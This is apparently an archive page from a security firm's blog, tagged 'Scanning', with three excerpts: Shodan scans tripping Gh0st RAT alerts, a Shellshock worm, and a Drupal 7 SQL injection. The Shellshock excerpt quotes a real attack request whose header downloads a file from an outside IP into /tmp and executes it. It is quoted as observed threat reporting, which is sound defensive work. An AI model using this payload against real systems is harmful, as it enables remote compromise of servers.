archive

Scanning

  1. Have you been haunted by the Gh0st RAT today?

    If you run certain network monitoring and security appliances, you may have had a few small heart attacks today. Organizations all around the world are receiving alerts that they may have a system that is infected with the Gh0st remote access trojan (RAT). Making things worse is that it will likely appear that it is a server that is infected. The good news is there is a very strong chance the alerting is a false positive. There is likely nothing malicious going on and all your need to do is tune your signatures. It turns out that Shodan is doing scans across the Internet in what appears to be an attempt to identify Gh0st RAT command and control (C2) servers. If you are not familiar with Gh0st, it’s a full featured RAT that sends a packet flag that is typically shared by the command and control server. The default packet […]

  2. A New Shellshock Worm on the Loose

    In a blog post from September last year, we described some of the early Shellshock activity we were seeing in the wild. Since then we have continued to observe periodic scanning, which have by in large not been particularly noteworthy. That remained the case until just a little bit ago. Starting late in the afternoon on April 8, 2015, the frequency and breadth of scanning observed by Volexity increased fairly dramatically. A closer look at the activity reveals that a worm (of sorts) has been set loose on the Internet looking for vulnerable hosts to exploit over HTTP. The inbound requests that have been observed look like this: GET HTTP/1.1 HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plain\r\n\r\nXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh […]

  3. Drupal Vulnerability: Mass Scans & Targeted Exploitation

    Yesterday (October 15, 2014), a critical SQL injection vulnerability in version 7 of the popular open source content management system (CMS) Drupal was disclosed by Stefan Horst and detailed in SA-CORE-2014-005. The description of the vulnerability is rather harrowing: Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks. This vulnerability can be exploited by anonymous users. If you think this sounds pretty bad, you are spot on. Along with the advisory, a patch was released to fix the security issue. Unfortunately, patches are also often leveraged to identify exactly how to exploit such vulnerabilities. In this case, it was only […]